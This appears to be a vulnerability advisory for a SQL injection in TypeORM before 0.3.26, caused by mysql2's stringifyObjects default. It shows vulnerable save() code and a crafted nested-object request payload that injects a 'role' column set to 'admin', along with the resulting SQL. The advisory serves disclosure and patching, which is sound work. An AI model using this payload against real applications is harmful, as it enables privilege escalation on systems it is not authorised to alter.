PT-2025-45757 · Npm · Typeorm
Published
2025-10-29
·
Updated
2025-10-29
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
Summary
SQL Injection vulnerability in TypeORM before 0.3.26 via crafted request to repository.save or repository.update due to the sqlstring call using stringifyObjects default to false.
Details
Vulnerable Code:
js
const { username, city, name} = req.body;
const updateData = {
username,
city,
name,
id:userId
}; // Developer aims to only allow above three fields to be updated
const result = await userRepo.save(updateData);Intended Payload (non-malicious):
username=myusername&city=Riga&name=JavadOR
{username:"myusername",phone:12345,name:"Javad"} SQL query produced:
sql
UPDATE `user`
SET `username` = 'myusername',
`city` = 'Riga',
`name` = 'Javad'
WHERE `id` IN (1);
Malicious Payload:
username=myusername&city[name]=Riga&city[role]=admin OR
{username:"myusername",city:{name:"Javad",role:"admin"}} SQL query produced with Injected Column:
sql
UPDATE `user`
SET `username` = 'myusername',
`city` = `name` = 'Javad',
`role` = 'admin'
WHERE `id` IN (1);
Above query is valid as
city = name = Javad is a boolean expression resulting in city = 1 (false). “role” column is injected and updated.Underlying issue was due to TypeORM using mysql2 without specifying a value for the stringifyObjects option. In both mysql and mysql2 this [option defaults to false](https://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/connection config.js#L124). This option is then passed into SQLString library as false. This results in sqlstring parsing objects in a strange way using objectToValues.
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Typeorm